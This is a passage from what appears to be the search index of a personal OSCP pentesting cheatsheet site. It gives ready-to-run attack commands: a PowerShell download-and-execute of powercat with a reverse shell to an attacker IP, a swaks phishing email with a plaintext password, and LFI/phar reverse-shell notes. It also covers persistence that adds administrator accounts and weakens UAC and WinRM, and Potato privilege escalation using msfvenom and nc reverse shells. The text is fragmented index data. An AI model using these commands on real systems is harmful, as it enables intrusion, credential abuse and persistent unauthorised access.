-c \u0026#34;IEX(New-Object System.Net.WebClient).DownloadString(\u0026#39;http://192.168.119.5:8000/powercat.ps1\u0026#39;); powercat -c 192.168.119.5 -p 4444 -e powershell\u0026#34; now transfer the shortcut file into the webdav dir in kali\nnow serve powercat via python3 webserv\ndir containing powercat python3 -m http.server 8000 Now set up netcatlistener\nnc -nlvp 4444 lets create the email now\nNow we are ready to build the swaks command to send the emails. We\u0026rsquo;ll provide daniela@beyond.com and marcus@beyond.com as recipients of the email to -t, john@beyond.com as name on the email envelope (sender) to \u0026ndash;from, and the Windows Library file to \u0026ndash;attach. Next, we\u0026rsquo;ll enter \u0026ndash;suppress-data to summarize information regarding the SMTP transactions. For the email subject and body, we\u0026rsquo;ll provide Subject: Staging Script to \u0026ndash;header and body.txt to \u0026ndash;body. In addition, we\u0026rsquo;ll enter the IP address of MAILSRV1 for \u0026ndash;server. Finally, we\u0026rsquo;ll add -ap to enable password authentication.\nkali@kali:~/beyond$ sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header \u0026#34;Subject: Staging Script\u0026#34; --suppress-data -ap Username: john Password: dqsTwTpZPn#nL Now wait.\nExecuting phar rev shell # ?page=phar:///var/www/html/uploads/archive.phar/test.txt LFI to RCE # https://medium.com/@lashin0x/local-file-inclusion-to-remote-code-execution-rce-bea0ec06342a Using Arson # docker-compose up -d localhost:80 and then visit\nhttp://localhost\nOption 1: Create a New Scope Target Best for: Starting fresh reconnaissance on a new target Choose Target Type: Company: Any asset owned by an organization (e.g., \u0026#34;Google\u0026#34;) Wildcard: Any subdomain under the root domain (e.g., \u0026#34;*.google.com\u0026#34;) URL: Specific attack vector targeting a single domain (e.g., \u0026#34;https://hackme.google.com\u0026#34;) Enter Target Information: For Company targets: Enter the company name For Wildcard targets: Enter the wildcard domain pattern For URL targets: Enter the specific URL Begin Reconnaissance: The framework will automatically start gathering intelligence about your target You can then run individual tools or use the Auto Scan feature Option 2: Import Existing Scan Data Best for: Learning from pre-scanned data or resuming previous sessions Import from File: Download a .rs0n file (like those available in the scan data repository) Click \u0026#34;Import Scan Data\u0026#34; in the welcome screen Select \u0026#34;Upload File\u0026#34; and choose your .rs0n file The framework will import all scope targets and associated scan results Import from URL: Click \u0026#34;Import Scan Data\u0026#34; in the welcome screen Select \u0026#34;Import from URL\u0026#34; Enter the raw GitHub URL of a .rs0n file: https://github.com/R-s0n/ars0n-framework-v2-scan-data/raw/refs/heads/main/Grammarly/rs0n-export-2025-07-27T18-19-17.rs0n The framework will download and import the data automatically Option 3: Use Pre-Scanned Data for Learning Best for: Understanding the bug bounty hunting process without running scans The Ars0n Framework v2 Scan Data Repository contains real-world scan data that you can import to learn: Subdomain Discovery: How various tools find subdomains and assets Vulnerability Assessment: Common security issues and how they\u0026#39;re identified Attack Surface Mapping: Understanding an organization\u0026#39;s digital footprint Reconnaissance Methodology: The systematic approach to bug bounty huntin Persistence # Adding our user to work with nxc later on\nnet user fatcat fatcat1234 /add net localgroup Administrators fatcat /add net user fatcat /active:yes Enable psexec and wmi\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f Enable evil-winrm\nwinrm quickconfig -q winrm set winrm/config/service/auth @{Basic=\u0026#34;true\u0026#34;} winrm set winrm/config/service @{AllowUnencrypted=\u0026#34;true\u0026#34;} netsh advfirewall firewall add rule name=\u0026#34;WinRM\u0026#34; dir=in action=allow protocol=TCP localport=5985 net start winrm net localgroup \u0026#34;Remote Desktop Users\u0026#34; fatcat /add Access\nimpacket-psexec fatcat:\u0026#39;fatcat1234\u0026#39;@192.168.139.189 impacket-wmiexec fatcat:\u0026#39;fatcat1234\u0026#39;@192.168.139.189 Potatoes # https://jlajara.gitlab.io/Potatoes_Windows_Privesc\nSigmaPotato # # Execute a Command ./SigmaPotato.exe \u0026lt;command\u0026gt; # Establish a PowerShell Reverse Shell ./SigmaPotato.exe --revshell \u0026lt;ip_addr\u0026gt; \u0026lt;port\u0026gt; # Return Help Information ./SigmaPotato.exe --help JuicyPotato # **msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=192.168.45.159 LPORT=1338 -f exe -o shell.exe .\\Juicy.Potato.x86.exe -t * -p .\\shellx86.exe -l 1338 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}** =================================== .\\Juicy.Potato.x86.exe -l 1360 -p c:\\windows\\system32\\cmd.exe -a \u0026#34;/c whoami\u0026#34; -t * if default doesnt work use a diff one with -c argument at the end https://github.com/ohpe/juicy-potato/tree/master/CLSID/?source=post_page-----96e74b36375a--------------------------------------- wuauserv is good choice .\\Juicy.Potato.x86.exe -l 1360 -p c:\\windows\\system32\\cmd.exe -a \u0026#34;/c c:\\users\\Public\\nc.exe -e cmd.exe 192.168.45.154 242\u0026#34; -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} GodPotato # \\godpotato.exe -cmd “nc.exe -e cmd 192.168.45.239 1338” Add our user\nGodPotato.exe -cmd \u0026#34;cmd /c net user dave4 fatcat1234 /add\u0026#34; GodPotato.exe -cmd \u0026#34;cmd /c net localgroup Administrators fatcat /add\u0026#34; net user fatcat /active:yes Enable psexec and wmi by disabling the UAC\nGodPotato.exe -cmd \u0026#34;cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f\u0026#34; and then get in\nimpacket-psexec dave4:\u0026#39;lab12345678$\u0026#39;@192.168.139.189 impacket-wmiexec dave4:\u0026#39;lab12345678$\u0026#39;@192.168.139.189 for winrm\nwinrm quickconfig -q winrm set winrm/config/service/auth @{Basic=\u0026#34;true\u0026#34;} winrm set winrm/config/service @{AllowUnencrypted=\u0026#34;true\u0026#34;} netsh advfirewall firewall add rule name=\u0026#34;WinRM\u0026#34; dir=in action=allow protocol=TCP localport=5985 net start winrm login\nevil-winrm -i 192.168.139.189 -u dave4 -p \u0026#39;lab12345678$\u0026#39; ","externalUrl":null,"permalink":"/tools/tooly-source/","section":"Tools","summary":"","title":"","type":"tools"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"Pick a cheatsheet below.\n","externalUrl":null,"permalink":"/cheatsheet/","section":"Cheatsheets","summary":"","title":"Cheatsheets","type":"cheatsheet"},{"content":"","externalUrl":null,"permalink":"/categories/enumeration/","section":"Categories","summary":"","title":"Enumeration","type":"categories"},{"content":" Go to # nmap -p- \u0026lt;ip addr\u0026gt; -sCV -A -Pn --min-rate=20000 Going through nmap scripts # ls -al /usr/share/nmap/scripts/ | grep ftp- Top UDP # nmap 10.129.18.188 -sU -top-ports=100 --min-rate=20000 Useful Switches # sn → Ping sweep sS → TCP SYN Pn → Disable host discovery p- → All ports sV → Version detection A → OS detect + scripts + traceroute O → OS detection T4 → Faster scan sC → Default scripts Port Knocking # for i in 571 290 911; do nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43 \u0026gt;/dev/null done ssh -i ~/keys/id_rsa_nineveh_amrois amrois@10.10.10.43 Filtered Ports # nmap -p- --min-rate 10000 \u0026lt;ip\u0026gt; ","externalUrl":null,"permalink":"/tools/nmap/","section":"Tools","summary":"","title":"nmap","type":"tools"},{"content":" Master Methodology # This page is the live checklist database extracted from my Notion workflow.\n","externalUrl":null,"permalink":"/cheatsheet/oscp-cheatsheet/","section":"Cheatsheets","summary":"","title":"OSCP Cheatsheet","type":"cheatsheet"},{"content":"","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"},{"content":"A GTFOBins-style searchable list built from my personal tooling notes.\n","externalUrl":null,"permalink":"/tools/","section":"Tools","summary":"","title":"Tools","type":"tools"}]